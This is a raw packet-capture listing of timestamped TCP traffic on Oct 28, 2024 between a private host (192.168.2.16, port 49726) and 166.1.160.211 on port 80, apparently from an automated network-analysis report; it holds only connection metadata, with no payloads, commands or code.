                                                                                                                                                              Oct 28, 2024 19:46:22.849369049 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.849375963 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.849400997 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.903233051 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.953860044 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.959472895 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.959528923 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.959563017 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.959589005 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.959634066 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.959669113 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.959685087 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.959721088 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.959767103 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.959772110 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.959808111 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.959840059 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.959856033 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.959955931 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.960007906 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.960009098 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.960042000 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.960076094 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.960103989 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.960109949 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.960144043 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.960164070 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.960177898 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.960211039 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.960227966 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.960268021 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.960300922 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.960315943 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.960336924 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.960386038 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.960388899 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.960438967 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.960470915 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.960481882 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.960505962 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.960556030 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.960558891 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.960593939 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.960639954 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.960644960 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.960678101 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.960714102 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.960726976 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.960747957 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.960782051 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.960798979 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.960817099 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.960850000 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.960867882 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.960885048 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.960939884 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.960958004 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.960992098 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.961026907 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.961040974 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.961091042 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.961123943 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.961142063 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.961158037 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.961193085 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.961205006 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.961328983 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.961361885 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.961374998 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.961396933 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.961431026 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.961445093 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.961464882 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.961498022 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.961512089 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.961533070 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.961576939 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.961646080 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.961678982 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.961714029 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.961731911 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.961745977 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.961780071 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.961797953 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:22.961813927 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:22.961848021 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.177761078 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.177784920 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.177819014 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.177829981 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.177870035 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.177903891 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.177915096 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.177956104 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.178003073 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.178003073 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.178036928 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.178070068 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.178080082 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.178122044 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.178154945 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.178167105 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.178189039 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.178222895 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.178246975 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.178272963 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.178311110 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.178343058 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.178344965 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.178376913 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.178390026 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.178411007 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.178443909 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.178457022 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.178478956 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.178513050 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.178529024 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.178546906 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.178582907 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.178594112 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.178702116 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.178735971 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.178746939 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.178770065 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.178803921 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.178811073 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.178837061 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.178870916 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.178881884 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.178904057 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.178937912 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.178950071 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.178972960 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.179007053 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.179022074 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.179042101 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.179075956 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.179105997 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.179111004 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.179145098 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.179161072 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.179197073 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.179229975 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.179239988 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.179264069 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.179300070 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.179320097 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.179352045 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.179383993 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.179395914 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.179440022 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.179472923 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.179483891 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.179507971 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.179542065 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.179554939 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.179577112 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.179610968 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.179626942 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.179645061 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.179698944 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.179768085 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.179800987 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.179836035 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.179851055 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.179922104 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.179950953 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.179969072 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.238140106 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.270663023 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.276365995 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.276401997 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.276448965 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.276527882 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.276563883 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.276597977 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.276613951 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.276631117 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.276679039 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.276681900 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.276717901 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.276751041 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.276767015 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.276786089 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.276833057 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.276837111 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.276871920 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.276906967 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.276923895 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.276992083 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.277024984 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.277043104 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.277173042 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.277220011 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.277221918 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.277256012 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.277290106 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.277307987 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.277323008 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.277359009 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.277368069 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.277499914 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.277534008 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.277548075 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.277569056 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.277602911 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.277612925 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.277636051 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.277668953 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.277677059 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.283350945 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.283351898 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.283386946 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.283437014 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.283642054 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.283675909 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.283711910 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.283725977 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.283822060 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.283854008 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.283866882 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.283888102 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.283920050 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.283940077 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.283953905 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.283987045 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.283998013 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.284020901 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.284070015 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.488419056 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.495480061 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.495544910 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.495582104 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.495604038 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.495615005 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.495650053 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.495662928 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.495683908 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.495719910 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.495729923 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.495842934 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.495876074 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.495889902 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.495910883 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.495944977 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.495960951 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.496181011 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.496215105 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.496226072 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.496267080 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.496311903 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.496351957 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.496387005 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.496421099 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.496437073 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.496474028 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.496509075 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.496517897 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.496542931 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.496577024 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.496587992 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.496613979 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.496661901 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.497309923 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.497344971 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.497380018 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.497399092 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.497502089 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.497536898 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.497549057 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.497570038 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.497603893 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.497616053 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.497637987 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.497672081 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.497684956 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.497706890 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.497759104 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.497791052 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.497824907 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.497873068 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.497874022 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.498537064 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.498569965 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.498589039 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.498605013 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.498639107 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.498656988 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.498672962 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.498707056 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.498728037 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.498742104 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.498786926 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.498833895 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.498867989 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.498902082 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.498914957 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.498935938 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:23.498985052 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:23.499528885 CET8049726166.1.160.211192.168.2.16
